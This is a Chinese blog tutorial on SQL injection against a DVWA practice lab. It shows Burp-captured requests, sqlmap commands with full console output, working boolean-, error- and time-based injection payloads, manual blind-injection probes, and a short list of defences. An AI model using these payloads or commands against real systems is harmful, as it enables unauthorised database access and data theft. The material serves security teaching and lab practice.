美文网首页
SQL注入漏洞原理及工具 - 安全工具篇

SQL注入漏洞原理及工具 - 安全工具篇

作者: DreamsonMa | 来源:发表于2019-05-02 15:43 被阅读0次

    SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通过SQL注入可以对程序对应的数据存储区进行对应的探测。

    形成SQL注入漏洞的原因:

    1. 用户输入不可控
    2. 输入内容被带入SQL语句执行

    使用SQLMAP进行SQL注入

    High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,这样做的目的是为了防止一般的sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,也就没办法进一步注入。因此,我们切换到medium级别。

    下面介绍如何使用SQLMAP+BURP SUITE进行SQL注入:

    1、使用BURP SUITE进行拦截请求

    使用BURP SUITE进行拦截

    2、保存请求到文件

    ➜  sql_inject cat medium.req 
POST /DVWA/vulnerabilities/sqli/ HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/DVWA/vulnerabilities/sqli/
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Cookie: security=medium; PHPSESSID=7uuahc8ucfobqc742g32vq62j5
Connection: close
Upgrade-Insecure-Requests: 1

id=1&Submit=Submit

    3、利用sqlmap进行注入

    ➜  sql_inject sqlmap -r medium.req --dbms=mysql  --level=5 --risk=3 -p id --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:39:24 /2019-05-02/

[03:39:24] [INFO] parsing HTTP request from 'medium.req'
[03:39:24] [INFO] testing connection to the target URL
[03:39:24] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: id=1 OR NOT 4345=4345&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 9913 FROM(SELECT COUNT(*),CONCAT(0x71707a7171,(SELECT (ELT(9913=9913,1))),0x71706b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)&Submit=Submit
---
[03:39:24] [INFO] testing MySQL
[03:39:24] [INFO] confirming MySQL
[03:39:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 7.2.7, Apache 2.4.33
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:39:25] [INFO] fetching database names
[03:39:25] [INFO] used SQL query returns 11 entries
[03:39:25] [INFO] resumed: '632-sit'
[03:39:25] [INFO] resumed: 'alan-oauth'
[03:39:25] [INFO] resumed: 'dvwa'
[03:39:25] [INFO] resumed: 'information_schema'
[03:39:25] [INFO] resumed: 'ins_tc_prd'
[03:39:25] [INFO] resumed: 'konga_database'
[03:39:25] [INFO] resumed: 'mysql'
[03:39:25] [INFO] resumed: 'performance_schema'
[03:39:25] [INFO] resumed: 'phpmyadmin'
[03:39:25] [INFO] resumed: 'renren_fast'
[03:39:25] [INFO] resumed: 'test'
available databases [11]:
[*] 632-sit
[*] alan-oauth
[*] dvwa
[*] information_schema
[*] ins_tc_prd
[*] konga_database
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] renren_fast
[*] test

[03:39:25] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'

[*] ending @ 03:39:25 /2019-05-02/

    使用SQLMAP进行SQL盲注测试

    盲注,是在SQL注入过程中,服务器并没有给客户端返回信息。通过盲注可以对程序对应的数据存储区进行对应的探测。盲注分类及判断:

    1. 基于时间,注意是否有延迟
      输入1 and sleep(5) #
      输入1' and sleep(5) #

    2. 基于布尔,注意返回结果是否相同
      输入1' and 1=1 #
      输入1' and 1=2 #

    下面介绍如何使用SQLMAP+BURP SUITE进行SQL盲注:

    1、通过BRUP SUITE获取数据包

    ➜  sql_inject cat hight_blind.req 
GET /DVWA/vulnerabilities/sqli_blind/ HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/DVWA/security.php
Cookie: id=1; security=high; PHPSESSID=7uuahc8ucfobqc742g32vq62j5
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

    2、使用SQLMAP进行盲注测试

    ➜  sql_inject sqlmap -r hight_blind.req --dbms=mysql  --level=5 --risk=3 -o  -p id --dbs
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:51:00 /2019-05-02/

[04:51:00] [INFO] parsing HTTP request from 'hight_blind.req'
[04:51:01] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] 
[04:51:09] [INFO] testing connection to the target URL
[04:51:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[04:51:09] [INFO] testing NULL connection to the target URL
[04:51:09] [INFO] NULL connection is supported with GET method ('Range')
[04:51:09] [INFO] testing if the target URL content is stable
[04:51:10] [INFO] target URL content is stable
[04:51:10] [INFO] testing if URI parameter '#1*' is dynamic
[04:51:10] [WARNING] URI parameter '#1*' does not appear to be dynamic
[04:51:10] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[04:51:10] [INFO] testing for SQL injection on URI parameter '#1*'
[04:51:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:51:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[04:51:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[04:51:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[04:51:18] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[04:51:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[04:51:20] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[04:51:21] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL - original value)'
[04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[04:51:21] [INFO] testing 'Boolean-based blind - Parameter replace (CASE - original value)'
[04:51:21] [INFO] testing 'HAVING boolean-based blind - WHERE, GROUP BY clause'
[04:51:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:51:24] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:51:25] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[04:51:26] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[04:51:28] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[04:51:30] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[04:51:32] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[04:51:34] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[04:51:36] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[04:51:38] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[04:51:40] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[04:51:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[04:51:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[04:51:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[04:51:41] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[04:51:41] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[04:51:42] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[04:51:42] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:51:42] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:51:43] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:51:44] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:51:44] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:51:45] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:51:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:51:46] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:51:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:51:47] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:51:48] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:51:48] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:51:49] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:51:50] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:51:50] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:51:50] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:51:51] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:51:51] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:51:51] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:51:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:51:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:51:51] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:51:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[04:51:51] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[04:51:51] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[04:51:51] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[04:51:51] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[04:51:51] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[04:51:51] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[04:51:51] [INFO] testing 'MySQL inline queries'
[04:51:51] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[04:51:52] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:51:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[04:51:52] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[04:51:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[04:51:53] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[04:51:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[04:51:54] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[04:51:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[04:51:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[04:51:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[04:51:56] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[04:51:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[04:51:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[04:51:57] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[04:51:58] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[04:51:59] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[04:51:59] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[04:52:00] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[04:52:00] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[04:52:01] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[04:52:01] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[04:52:02] [INFO] testing 'MySQL AND time-based blind (ELT)'
[04:52:02] [INFO] testing 'MySQL OR time-based blind (ELT)'
[04:52:03] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[04:52:03] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[04:52:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:52:04] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:52:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[04:52:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[04:52:04] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[04:52:04] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[04:52:04] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[04:52:04] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[04:52:04] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[04:52:04] [INFO] testing 'MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
[04:52:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[04:52:09] [INFO] testing 'Generic UNION query (random number) - 1 to 10 columns'
it is not recommended to perform extended UNION tests if there is not at least one other (potential) technique found. Do you want to skip? [Y/n] 
[04:52:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[04:52:22] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[04:52:26] [WARNING] URI parameter '#1*' does not seem to be injectable
do you want to URL encode cookie values (implementation specific)? [Y/n] 
[04:52:29] [WARNING] heuristic (basic) test shows that Cookie parameter 'id' might not be injectable
[04:52:32] [INFO] testing for SQL injection on Cookie parameter 'id'
[04:52:32] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:52:33] [INFO] Cookie parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[04:52:33] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:52:33] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:52:35] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:52:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:52:35] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:52:35] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:52:36] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:52:36] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:52:36] [INFO] Cookie parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[04:52:36] [INFO] testing 'MySQL inline queries'
[04:52:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[04:52:39] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:52:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[04:52:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[04:52:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[04:52:47] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[04:52:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[04:52:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[04:53:35] [INFO] Cookie parameter 'id' appears to be 'MySQL >= 5.0.12 OR time-based blind' injectable 
[04:53:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:53:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:53:45] [INFO] target URL appears to be UNION injectable with 2 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] 
[04:53:47] [INFO] testing 'Generic UNION query (28) - 21 to 40 columns'
[04:53:57] [INFO] testing 'Generic UNION query (28) - 41 to 60 columns'
[04:54:16] [INFO] testing 'Generic UNION query (28) - 61 to 80 columns'
[04:54:21] [INFO] testing 'Generic UNION query (28) - 81 to 100 columns'
[04:54:37] [INFO] testing 'MySQL UNION query (28) - 1 to 20 columns'
[04:54:39] [INFO] testing 'MySQL UNION query (28) - 21 to 40 columns'
[04:54:55] [INFO] testing 'MySQL UNION query (28) - 41 to 60 columns'
[04:54:55] [INFO] testing 'MySQL UNION query (28) - 61 to 80 columns'
[04:55:06] [INFO] testing 'MySQL UNION query (28) - 81 to 100 columns'
Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 5089 HTTP(s) requests:
---
Parameter: id (Cookie)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 5259=5259-- ySeP; security=high; PHPSESSID=7uuahc8ucfobqc742g32vq62j5

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' OR (SELECT 6054 FROM(SELECT COUNT(*),CONCAT(0x717a766b71,(SELECT (ELT(6054=6054,1))),0x716b787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VDSN; security=high; PHPSESSID=7uuahc8ucfobqc742g32vq62j5

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: id=1' OR SLEEP(5)-- JOIw; security=high; PHPSESSID=7uuahc8ucfobqc742g32vq62j5
---
[04:56:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 7.2.7, Apache 2.4.33
back-end DBMS: MySQL >= 5.0
[04:56:12] [INFO] fetching database names
[04:56:17] [INFO] used SQL query returns 11 entries
[04:56:17] [INFO] starting 3 threads
[04:56:21] [INFO] retrieved: '632-sit'
[04:56:21] [INFO] retrieved: 'dvwa'
[04:56:21] [INFO] retrieved: 'alan-oauth'
[04:56:21] [INFO] retrieved: 'information_schema'
[04:56:21] [INFO] retrieved: 'ins_tc_prd'
[04:56:21] [INFO] retrieved: 'konga_database'
[04:56:21] [INFO] retrieved: 'mysql'
[04:56:25] [INFO] retrieved: 'performance_schema'
[04:56:25] [INFO] retrieved: 'phpmyadmin'
[04:56:25] [INFO] retrieved: 'renren_fast'
[04:56:25] [INFO] retrieved: 'test'
available databases [11]:
[*] 632-sit
[*] alan-oauth
[*] dvwa
[*] information_schema
[*] ins_tc_prd
[*] konga_database
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] renren_fast
[*] test

[04:56:25] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 2896 times, 404 (Not Found) - 3441 times
[04:56:25] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.56.101'

[*] ending @ 04:56:25 /2019-05-02/

    SQL注入防御

    1. 过滤用户输入
    2. 使用预编译处理SQL语句(PDO 、Sqlparameter)
    3. 使用owasp等安全的sql处理API

    The End !

    参考文章:
    手工SQL注入
    手工SQL盲注
    SQLMAP使用

    相关文章

      网友评论

          本文标题:SQL注入漏洞原理及工具 - 安全工具篇

          本文链接:https://www.haomeiwen.com/subject/kgxnnqtx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|SQL注入漏洞原理及工具 - 安全工具篇|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!